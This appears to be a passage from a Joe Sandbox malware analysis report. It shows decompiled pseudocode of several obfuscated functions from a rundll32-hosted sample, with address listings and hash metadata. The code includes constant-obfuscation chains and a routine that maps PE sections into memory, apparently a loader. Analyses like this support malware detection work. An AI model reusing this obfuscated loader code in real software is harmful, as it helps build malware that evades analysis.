				 *(_t245 + 0x50) =  *(_t245 + 0x50) ^ 0xc3874735;
				 *(_t245 + 0x18) = 0x52bd7f;
				 *(_t245 + 0x18) =  *(_t245 + 0x18) ^ 0x005e950b;
				 *(_t245 + 0x3c) = 0xe72c64;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) * 0x71;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) | 0xa2bf1516;
				 *(_t245 + 0x3c) =  *(_t245 + 0x3c) ^ 0xe6bf08bc;
				 *(_t245 + 0x48) = 0x12926a;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) | 0xd69b5974;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) << 0xc;
				 *(_t245 + 0x48) =  *(_t245 + 0x48) ^ 0xbdb2bc40;
				 *(_t245 + 0x5c) = 0xf2f3b3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) << 3;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0xffff4add;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) + 0x5b51;
				 *(_t245 + 0x5c) =  *(_t245 + 0x5c) ^ 0x0796f200;
				 *(_t245 + 0x64) = 0x250dfe;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) << 7;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) | 0xde1ed6e5;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0xc3c6abe4;
				 *(_t245 + 0x64) =  *(_t245 + 0x64) ^ 0x1d594f44;
				 *(_t245 + 0x68) = 0x1b0053;
				_t226 = 0x44;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) * 0x1d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) >> 0xa;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa237b60d;
				 *(_t245 + 0x68) =  *(_t245 + 0x68) ^ 0xa23e8db7;
				 *(_t245 + 0x30) = 0x848c63;
				_t142 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 + 0x30) =  *(_t245 + 0x30) / _t226;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x3584b77a;
				 *(_t245 + 0x30) =  *(_t245 + 0x30) ^ 0x35842ad7;
				 *(_t245 + 0x28) = 0x69c662;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) * 0x1f;
				 *(_t245 + 0x28) =  *(_t245 + 0x28) ^ 0x0ccd1c29;
				 *(_t245 + 0x20) = 0x70b48b;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xdd83dbf0;
				 *(_t245 + 0x20) =  *(_t245 + 0x20) ^ 0xddf73f48;
				 *(_t245 + 0x1c) = 0x80403c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) * 0x1c;
				 *(_t245 + 0x1c) =  *(_t245 + 0x1c) ^ 0x0e0dbad6;
				_push( *(_t245 + 0x58));
				_push( *(_t245 + 0x40));
				_t236 = 0x1e;
				E00334B61(_t142, _t236);
				_t166 = _t245 - 0x220; // 0x12da7b13
				E00334B61(_t166, 0x208,  *(_t245 + 0x24),  *(_t245 + 0x34));
				_t169 = _t245 - 0x428; // 0x12da790b
				E00334B61(_t169, 0x208,  *(_t245 + 0x2c),  *(_t245 + 0x60));
				_t171 = _t245 - 0x220; // 0x12da7b13
				E00333BC0( *(_t245 + 0x44),  *(_t245 + 0x50), __edx,  *(_t245 + 0x18),  *(_t245 + 0x3c), _t171);
				_t176 = _t245 - 0x428; // 0x12da790b
				E00333BC0( *(_t245 + 0x48),  *(_t245 + 0x5c),  *((intOrPtr*)(_t245 + 0x78)),  *(_t245 + 0x64),  *(_t245 + 0x68), _t176);
				_t183 = _t245 - 0x18; // 0x12da7d1b
				 *(_t245 - 0x14) =  *(_t245 + 0x38);
				_t185 = _t245 - 0x220; // 0x12da7b13
				 *((intOrPtr*)(_t245 - 0x10)) = _t185;
				_t187 = _t245 - 0x428; // 0x12da790b
				 *((intOrPtr*)(_t245 - 0xc)) = _t187;
				 *((short*)(_t245 - 8)) =  *(_t245 + 0x54) |  *(_t245 + 0x4c) | 0x00000410;
				_t222 = E00334DDD( *(_t245 + 0x30), _t183,  *(_t245 + 0x28),  *(_t245 + 0x20),  *(_t245 + 0x1c));
				asm("sbb eax, eax");
				return  ~_t222 + 1;
			}









                                                                                                                    0x003513ae
                                                                                                                    0x003513b9
                                                                                                                    0x003513be
                                                                                                                    0x003513c1
                                                                                                                    0x003513c4
                                                                                                                    0x003513c5
                                                                                                                    0x003513c6
                                                                                                                    0x003513cb
                                                                                                                    0x003513cf
                                                                                                                    0x003513d3
                                                                                                                    0x003513da
                                                                                                                    0x003513e1
                                                                                                                    0x003513e8
                                                                                                                    0x003513ef
                                                                                                                    0x003513f2
                                                                                                                    0x003513f9
                                                                                                                    0x00351404
                                                                                                                    0x0035140b
                                                                                                                    0x00351412
                                                                                                                    0x00351415
                                                                                                                    0x0035141c
                                                                                                                    0x00351423
                                                                                                                    0x0035142a
                                                                                                                    0x00351431
                                                                                                                    0x00351438
                                                                                                                    0x0035143c
                                                                                                                    0x00351440
                                                                                                                    0x00351447
                                                                                                                    0x0035144e
                                                                                                                    0x00351455
                                                                                                                    0x0035145c
                                                                                                                    0x00351460
                                                                                                                    0x00351467
                                                                                                                    0x0035146e
                                                                                                                    0x00351475
                                                                                                                    0x0035147c
                                                                                                                    0x00351483
                                                                                                                    0x0035148a
                                                                                                                    0x00351491
                                                                                                                    0x00351498
                                                                                                                    0x0035149f
                                                                                                                    0x003514a6
                                                                                                                    0x003514ad
                                                                                                                    0x003514b4
                                                                                                                    0x003514bb
                                                                                                                    0x003514bf
                                                                                                                    0x003514c6
                                                                                                                    0x003514cd
                                                                                                                    0x003514d4
                                                                                                                    0x003514db
                                                                                                                    0x003514e2
                                                                                                                    0x003514e9
                                                                                                                    0x003514f0
                                                                                                                    0x003514f4
                                                                                                                    0x003514f8
                                                                                                                    0x003514ff
                                                                                                                    0x00351506
                                                                                                                    0x00351513
                                                                                                                    0x0035151a
                                                                                                                    0x00351525
                                                                                                                    0x00351528
                                                                                                                    0x0035152f
                                                                                                                    0x00351536
                                                                                                                    0x0035153d
                                                                                                                    0x00351544
                                                                                                                    0x00351548
                                                                                                                    0x0035154f
                                                                                                                    0x00351556
                                                                                                                    0x0035155a
                                                                                                                    0x00351561
                                                                                                                    0x00351568
                                                                                                                    0x0035156f
                                                                                                                    0x00351576
                                                                                                                    0x0035157a
                                                                                                                    0x00351581
                                                                                                                    0x0035158a
                                                                                                                    0x00351591
                                                                                                                    0x0035159e
                                                                                                                    0x0035159f
                                                                                                                    0x003515a2
                                                                                                                    0x003515a6
                                                                                                                    0x003515ad
                                                                                                                    0x003515b4
                                                                                                                    0x003515c0
                                                                                                                    0x003515c3
                                                                                                                    0x003515c6
                                                                                                                    0x003515cd
                                                                                                                    0x003515d4
                                                                                                                    0x003515df
                                                                                                                    0x003515e2
                                                                                                                    0x003515e9
                                                                                                                    0x003515f0
                                                                                                                    0x003515f7
                                                                                                                    0x003515fe
                                                                                                                    0x00351609
                                                                                                                    0x0035160c
                                                                                                                    0x00351613
                                                                                                                    0x00351616
                                                                                                                    0x0035161b
                                                                                                                    0x0035161c
                                                                                                                    0x00351629
                                                                                                                    0x00351632
                                                                                                                    0x0035163f
                                                                                                                    0x00351648
                                                                                                                    0x0035164d
                                                                                                                    0x00351661
                                                                                                                    0x00351666
                                                                                                                    0x0035167c
                                                                                                                    0x00351684
                                                                                                                    0x00351687
                                                                                                                    0x0035168d
                                                                                                                    0x00351693
                                                                                                                    0x00351696
                                                                                                                    0x0035169c
                                                                                                                    0x003516b0
                                                                                                                    0x003516ba
                                                                                                                    0x003516c4
                                                                                                                    0x003516cc

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: !h$5M$d,
                                                                                                                    • API String ID: 0-3324333736
                                                                                                                    • Opcode ID: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                    • Instruction ID: 333d2b5ad5dd4a879eb0d3e2fa205215d99849f93a41beb8f451c564300066e7
                                                                                                                    • Opcode Fuzzy Hash: 31a7f9833dcd0b326e9f299eef76f1a004f3f3853abdcdc5a6d1f5c948d3c773
                                                                                                                    • Instruction Fuzzy Hash: F591CEB140038C9BCF59CF65C98A9DE3FB1BB04358F509219FD2A96260D3B5C999CF84
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034DEDC Relevance: 3.9, Strings: 3, Instructions: 162COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E0034DEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				void* _t132;
				signed int _t152;
				signed int _t154;
				signed int _t155;
				void* _t158;
				signed int* _t175;
				void* _t177;
				void* _t178;

				_push(_a16);
				_t174 = _a12;
				_t175 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t132);
				_v68 = 0x4bd93;
				_t178 = _t177 + 0x18;
				_v68 = _v68 << 0xc;
				_v68 = _v68 ^ 0x4bd93000;
				_t158 = 0xc7349d4;
				_v72 = 0xdd086a;
				_v72 = _v72 + 0xe602;
				_v72 = _v72 ^ 0x00de9932;
				_v80 = 0x3b4fac;
				_v80 = _v80 | 0x3fbbffff;
				_v80 = _v80 ^ 0x3fb1db7a;
				_v84 = 0xeaa49b;
				_v84 = _v84 | 0xeaf55708;
				_v84 = _v84 ^ 0x8a8b7318;
				_v84 = _v84 ^ 0x607b886d;
				_v88 = 0x47a;
				_v88 = _v88 << 0x10;
				_v88 = _v88 << 7;
				_v88 = _v88 ^ 0x3d0d9eb4;
				_v92 = 0xf1af5e;
				_v92 = _v92 >> 0xc;
				_t154 = 0x35;
				_v92 = _v92 * 0x55;
				_v92 = _v92 ^ 0x000492d7;
				_v104 = 0x9f0b47;
				_v104 = _v104 + 0xffffc934;
				_v104 = _v104 ^ 0x723421f7;
				_v104 = _v104 | 0x7192d654;
				_v104 = _v104 ^ 0x73b08a7e;
				_v100 = 0x1207d9;
				_v100 = _v100 + 0x7e1b;
				_v100 = _v100 | 0x7b677906;
				_v100 = _v100 * 0xf;
				_v100 = _v100 ^ 0x3c0b4b50;
				_v60 = 0x5b441e;
				_v60 = _v60 ^ 0x5c22d9cd;
				_v60 = _v60 ^ 0x5c7ef938;
				_v64 = 0xefe367;
				_v64 = _v64 + 0x4581;
				_v64 = _v64 ^ 0x00f6697a;
				_v76 = 0x71c375;
				_t155 = 0x14;
				_v76 = _v76 / _t154;
				_v76 = _v76 + 0xaf56;
				_v76 = _v76 ^ 0x000ba048;
				_v48 = 0x1a9f92;
				_v48 = _v48 + 0x9d50;
				_v48 = _v48 ^ 0x001d37d0;
				_v52 = 0xf5c688;
				_v52 = _v52 + 0xffff5f34;
				_v52 = _v52 ^ 0x00ffa10c;
				_v56 = 0x3cec64;
				_v56 = _v56 ^ 0x003949c0;
				_v96 = 0x7057ec;
				_v96 = _v96 * 0x35;
				_v96 = _v96 | 0xca3e56e5;
				_v96 = _v96 / _t155;
				_v96 = _v96 ^ 0x0b2d80e0;
				do {
					while(_t158 != 0x254c3a7) {
						if(_t158 == 0x324cad4) {
							E00340DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
							_t178 = _t178 + 0x10;
							_t158 = 0xd972b83;
							continue;
						} else {
							if(_t158 == 0xc7349d4) {
								_t158 = 0x254c3a7;
								 *_t175 =  *_t175 & 0x00000000;
								_t175[1] = _v68;
								continue;
							} else {
								if(_t158 == 0xd972b83) {
									E00350E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
								} else {
									if(_t158 == 0xecd5bc1) {
										_push(_t158);
										_push(_t158);
										_t152 = E00337FF2(_t175[1]);
										 *_t175 = _t152;
										__eflags = _t152;
										if(__eflags != 0) {
											_t158 = 0xfbc7198;
											continue;
										}
									} else {
										if(_t158 != 0xfbc7198) {
											goto L13;
										} else {
											E00333DBC( &_v44, _t175, _v88, _v92, _v104);
											_t178 = _t178 + 0xc;
											_t158 = 0x324cad4;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t175;
						_t131 =  *_t175 != 0;
						__eflags = _t131;
						return 0 | _t131;
					}
					_t175[1] = E0034AC3A(_t174);
					_t158 = 0xecd5bc1;
					L13:
					__eflags = _t158 - 0x72dd7bf;
				} while (__eflags != 0);
				goto L16;
			}



























                                                                                                                    0x0034dee3
                                                                                                                    0x0034deea
                                                                                                                    0x0034def1
                                                                                                                    0x0034def3
                                                                                                                    0x0034def4
                                                                                                                    0x0034defb
                                                                                                                    0x0034df02
                                                                                                                    0x0034df03
                                                                                                                    0x0034df04
                                                                                                                    0x0034df09
                                                                                                                    0x0034df11
                                                                                                                    0x0034df14
                                                                                                                    0x0034df1b
                                                                                                                    0x0034df23
                                                                                                                    0x0034df28
                                                                                                                    0x0034df30
                                                                                                                    0x0034df38
                                                                                                                    0x0034df40
                                                                                                                    0x0034df48
                                                                                                                    0x0034df50
                                                                                                                    0x0034df58
                                                                                                                    0x0034df60
                                                                                                                    0x0034df68
                                                                                                                    0x0034df70
                                                                                                                    0x0034df78
                                                                                                                    0x0034df80
                                                                                                                    0x0034df85
                                                                                                                    0x0034df8a
                                                                                                                    0x0034df92
                                                                                                                    0x0034df9a
                                                                                                                    0x0034dfa6
                                                                                                                    0x0034dfa9
                                                                                                                    0x0034dfad
                                                                                                                    0x0034dfb5
                                                                                                                    0x0034dfbd
                                                                                                                    0x0034dfc5
                                                                                                                    0x0034dfcd
                                                                                                                    0x0034dfd5
                                                                                                                    0x0034dfdd
                                                                                                                    0x0034dfe5
                                                                                                                    0x0034dfed
                                                                                                                    0x0034dffa
                                                                                                                    0x0034dffe
                                                                                                                    0x0034e006
                                                                                                                    0x0034e00e
                                                                                                                    0x0034e016
                                                                                                                    0x0034e01e
                                                                                                                    0x0034e026
                                                                                                                    0x0034e02e
                                                                                                                    0x0034e036
                                                                                                                    0x0034e044
                                                                                                                    0x0034e045
                                                                                                                    0x0034e049
                                                                                                                    0x0034e051
                                                                                                                    0x0034e059
                                                                                                                    0x0034e061
                                                                                                                    0x0034e069
                                                                                                                    0x0034e071
                                                                                                                    0x0034e079
                                                                                                                    0x0034e081
                                                                                                                    0x0034e089
                                                                                                                    0x0034e099
                                                                                                                    0x0034e0a1
                                                                                                                    0x0034e0ae
                                                                                                                    0x0034e0b2
                                                                                                                    0x0034e0cc
                                                                                                                    0x0034e0d0
                                                                                                                    0x0034e0d8
                                                                                                                    0x0034e0d8
                                                                                                                    0x0034e0e6
                                                                                                                    0x0034e176
                                                                                                                    0x0034e17b
                                                                                                                    0x0034e17e
                                                                                                                    0x00000000
                                                                                                                    0x0034e0e8
                                                                                                                    0x0034e0ee
                                                                                                                    0x0034e153
                                                                                                                    0x0034e155
                                                                                                                    0x0034e158
                                                                                                                    0x00000000
                                                                                                                    0x0034e0f0
                                                                                                                    0x0034e0f6
                                                                                                                    0x0034e1bd
                                                                                                                    0x0034e0fc
                                                                                                                    0x0034e102
                                                                                                                    0x0034e13c
                                                                                                                    0x0034e13d
                                                                                                                    0x0034e13e
                                                                                                                    0x0034e143
                                                                                                                    0x0034e147
                                                                                                                    0x0034e149
                                                                                                                    0x0034e14b
                                                                                                                    0x00000000
                                                                                                                    0x0034e14b
                                                                                                                    0x0034e104
                                                                                                                    0x0034e106
                                                                                                                    0x00000000
                                                                                                                    0x0034e10c
                                                                                                                    0x0034e11e
                                                                                                                    0x0034e123
                                                                                                                    0x0034e126
                                                                                                                    0x00000000
                                                                                                                    0x0034e126
                                                                                                                    0x0034e106
                                                                                                                    0x0034e102
                                                                                                                    0x0034e0f6
                                                                                                                    0x0034e0ee
                                                                                                                    0x0034e1c5
                                                                                                                    0x0034e1c7
                                                                                                                    0x0034e1cc
                                                                                                                    0x0034e1cc
                                                                                                                    0x0034e1d3
                                                                                                                    0x0034e1d3
                                                                                                                    0x0034e18f
                                                                                                                    0x0034e192
                                                                                                                    0x0034e197
                                                                                                                    0x0034e197
                                                                                                                    0x0034e197
                                                                                                                    0x00000000

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: d<$g$Wp
                                                                                                                    • API String ID: 0-355099142
                                                                                                                    • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                    • Instruction ID: bccee8c850b3808b4bc29f71aff8678a5048a6f387f42489c23d77ccaf927a75
                                                                                                                    • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                    • Instruction Fuzzy Hash: DB7122B10093419FD769CF61C48982BBBF1FBC9748F50891DF29A9A220D3769A49CF47
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034C3A0 Relevance: 3.9, Strings: 3, Instructions: 150COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E0034C3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				signed int _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* _t137;
				void* _t149;
				void* _t159;
				void* _t161;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t188;
				void* _t193;
				intOrPtr* _t195;
				signed int* _t197;
				signed int* _t198;
				signed int* _t199;

				_push(_a16);
				_t195 = __ecx;
				_push(0);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t137);
				_v4 = _v4 & 0x00000000;
				_v12 = 0x8437e8;
				_v8 = 0xdb9720;
				_v60 = 0xf5e956;
				_v60 = _v60 << 0xc;
				_t163 = 0x6b;
				_v60 = _v60 / _t163;
				_v60 = _v60 | 0x488cc8ef;
				_v60 = _v60 ^ 0x48eedbff;
				_v44 = 0x82c5a5;
				_v44 = _v44 | 0x04b6a6f1;
				_t164 = 0x4a;
				_v44 = _v44 * 0x6a;
				_v44 = _v44 ^ 0xf3bc2b72;
				_v40 = 0x882fad;
				_v40 = _v40 ^ 0x709d76bd;
				_v40 = _v40 + 0xffff52d2;
				_v40 = _v40 ^ 0x7014aba2;
				_v28 = 0x22e756;
				_v28 = _v28 + 0x769a;
				_v28 = _v28 ^ 0x002bcc4a;
				_v64 = 0xc290d0;
				_v64 = _v64 + 0xffff641a;
				_v64 = _v64 << 0xd;
				_v64 = _v64 ^ 0xbd78a131;
				_v64 = _v64 ^ 0x83ed8c94;
				_v32 = 0x78b1b0;
				_v32 = _v32 << 0xe;
				_v32 = _v32 ^ 0x2c621b2d;
				_v36 = 0xa1b61f;
				_v36 = _v36 + 0xb017;
				_v36 = _v36 | 0xc1836c3e;
				_v36 = _v36 ^ 0xc1a0ee75;
				_v56 = 0x2861cb;
				_v56 = _v56 / _t164;
				_v56 = _v56 << 0xd;
				_t165 = 0x1b;
				_v56 = _v56 / _t165;
				_v56 = _v56 ^ 0x00aa9f16;
				_v24 = 0x4a8582;
				_v24 = _v24 | 0x39704e96;
				_v24 = _v24 ^ 0x397cf0ca;
				_v52 = 0x9fdf3f;
				_v52 = _v52 | 0x733ecb9c;
				_v52 = _v52 >> 0x10;
				_t166 = 0x2c;
				_v52 = _v52 / _t166;
				_v52 = _v52 ^ 0x0002453b;
				_v20 = 0x70cd9;
				_v20 = _v20 ^ 0x0384d77a;
				_v20 = _v20 ^ 0x03811849;
				_v16 = 0x6ca56e;
				_v16 = _v16 * 0x1c;
				_v16 = _v16 ^ 0x0be055d0;
				_v48 = 0x383b50;
				_v48 = _v48 + 0xe78c;
				_v48 = _v48 + 0x7960;
				_v48 = _v48 + 0xffff251b;
				_v48 = _v48 ^ 0x003eca00;
				_t167 = _v28;
				_t149 = E0033474F(_t167, __ecx, _v64, _v32);
				_t159 = _t149;
				_t197 =  &(( &_v64)[8]);
				if(_t159 != 0) {
					_push(_t167);
					_t188 = E0033A3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
					_t198 =  &(_t197[5]);
					if(_t188 == 0) {
						L6:
						return _t188;
					}
					E0033ED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
					_t199 =  &(_t198[3]);
					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
					while(_t193 < _t161) {
						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
						E0033ED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
						_t199 =  &(_t199[3]);
						_t193 = _t193 + 0x28;
					}
					goto L6;
				}
				return _t149;
			}


































                                                                                                                    0x0034c3a5
                                                                                                                    0x0034c3a9
                                                                                                                    0x0034c3ab
                                                                                                                    0x0034c3ad
                                                                                                                    0x0034c3b1
                                                                                                                    0x0034c3b5
                                                                                                                    0x0034c3b6
                                                                                                                    0x0034c3b7
                                                                                                                    0x0034c3bc
                                                                                                                    0x0034c3c3
                                                                                                                    0x0034c3cb
                                                                                                                    0x0034c3d3
                                                                                                                    0x0034c3db
                                                                                                                    0x0034c3e6
                                                                                                                    0x0034c3eb
                                                                                                                    0x0034c3f1
                                                                                                                    0x0034c3f9
                                                                                                                    0x0034c401
                                                                                                                    0x0034c409
                                                                                                                    0x0034c416
                                                                                                                    0x0034c419
                                                                                                                    0x0034c41d
                                                                                                                    0x0034c425
                                                                                                                    0x0034c42d
                                                                                                                    0x0034c435
                                                                                                                    0x0034c43d
                                                                                                                    0x0034c445
                                                                                                                    0x0034c44d
                                                                                                                    0x0034c455
                                                                                                                    0x0034c45d
                                                                                                                    0x0034c465
                                                                                                                    0x0034c46d
                                                                                                                    0x0034c472
                                                                                                                    0x0034c47a
                                                                                                                    0x0034c482
                                                                                                                    0x0034c48a
                                                                                                                    0x0034c48f
                                                                                                                    0x0034c497
                                                                                                                    0x0034c49f
                                                                                                                    0x0034c4a7
                                                                                                                    0x0034c4af
                                                                                                                    0x0034c4b7
                                                                                                                    0x0034c4c7
                                                                                                                    0x0034c4cb
                                                                                                                    0x0034c4d4
                                                                                                                    0x0034c4d9
                                                                                                                    0x0034c4df
                                                                                                                    0x0034c4e7
                                                                                                                    0x0034c4ef
                                                                                                                    0x0034c4f7
                                                                                                                    0x0034c4ff
                                                                                                                    0x0034c507
                                                                                                                    0x0034c50f
                                                                                                                    0x0034c518
                                                                                                                    0x0034c51b
                                                                                                                    0x0034c51f
                                                                                                                    0x0034c527
                                                                                                                    0x0034c52f
                                                                                                                    0x0034c537
                                                                                                                    0x0034c53f
                                                                                                                    0x0034c54c
                                                                                                                    0x0034c550
                                                                                                                    0x0034c55a
                                                                                                                    0x0034c562
                                                                                                                    0x0034c56a
                                                                                                                    0x0034c572
                                                                                                                    0x0034c57a
                                                                                                                    0x0034c58a
                                                                                                                    0x0034c58e
                                                                                                                    0x0034c593
                                                                                                                    0x0034c595
                                                                                                                    0x0034c59a
                                                                                                                    0x0034c5a9
                                                                                                                    0x0034c5c3
                                                                                                                    0x0034c5c5
                                                                                                                    0x0034c5ca
                                                                                                                    0x0034c628
                                                                                                                    0x00000000
                                                                                                                    0x0034c62a
                                                                                                                    0x0034c5dd
                                                                                                                    0x0034c5e6
                                                                                                                    0x0034c5f0
                                                                                                                    0x0034c5f5
                                                                                                                    0x0034c623
                                                                                                                    0x0034c60a
                                                                                                                    0x0034c618
                                                                                                                    0x0034c61d
                                                                                                                    0x0034c620
                                                                                                                    0x0034c620
                                                                                                                    0x00000000
                                                                                                                    0x0034c627
                                                                                                                    0x0034c630

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: P;8$V"$`y
                                                                                                                    • API String ID: 0-4109183828
                                                                                                                    • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                    • Instruction ID: 11e290ba2e8c4ebc9438343e2ba6b00a979c71e0e228d29da16f37e50b49dc34
                                                                                                                    • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                    • Instruction Fuzzy Hash: 5F6145B15183409FC354CF66C88991BBBF1FBC9718F108A1CF69A9A260D7B6D919CF06
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00331A56 Relevance: 3.9, Strings: 3, Instructions: 115COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 93%
                                                                                                                    			E00331A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t86;
				void* _t100;
				void* _t101;
				void* _t103;
				void* _t115;
				void* _t116;
				signed int _t117;
				void* _t119;
				void* _t120;

				_push(_a8);
				_t115 = __edx;
				_t101 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t86);
				_v72 = 0xccde8a;
				_t120 = _t119 + 0x10;
				_v72 = _v72 | 0xfb673ead;
				_v72 = _v72 + 0xedb6;
				_t116 = 0;
				_v72 = _v72 + 0xffff76c0;
				_t103 = 0x3303944;
				_v72 = _v72 ^ 0xfbf43e98;
				_v48 = 0xd56f6c;
				_v48 = _v48 ^ 0x96c3cc23;
				_v48 = _v48 ^ 0x96174539;
				_v76 = 0xdcf6fd;
				_v76 = _v76 + 0xffffee01;
				_t117 = 0x65;
				_v76 = _v76 * 0x23;
				_v76 = _v76 + 0xffff4e11;
				_v76 = _v76 ^ 0x1e3c7761;
				_v80 = 0x144f78;
				_v80 = _v80 * 0x39;
				_v80 = _v80 ^ 0xe273dc44;
				_v80 = _v80 >> 5;
				_v80 = _v80 ^ 0x073b5be1;
				_v52 = 0xb4a3bb;
				_v52 = _v52 ^ 0x916b14c7;
				_v52 = _v52 ^ 0x91dd676b;
				_v68 = 0x8d73f0;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 * 0x1c;
				_v68 = _v68 ^ 0x0000c864;
				_v56 = 0xe6cb06;
				_v56 = _v56 >> 4;
				_v56 = _v56 | 0x1af2f565;
				_v56 = _v56 ^ 0x1af384df;
				_v60 = 0x4f2325;
				_t55 =  &_v60; // 0x4f2325
				_v60 =  *_t55 * 0x78;
				_t57 =  &_v60; // 0x4f2325
				_v60 =  *_t57 / _t117;
				_v60 = _v60 ^ 0x0059a097;
				_v64 = 0xa290a2;
				_v64 = _v64 >> 4;
				_v64 = _v64 + 0x6f89;
				_v64 = _v64 ^ 0x00044b6b;
				while(_t103 != 0x3303944) {
					if(_t103 == 0x5a97fa2) {
						__eflags = E0034D97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
						_t116 =  !=  ? 1 : _t116;
					} else {
						if(_t103 == 0xa5a4144) {
							E00333DBC( &_v44, _t101, _v72, _v48, _v76);
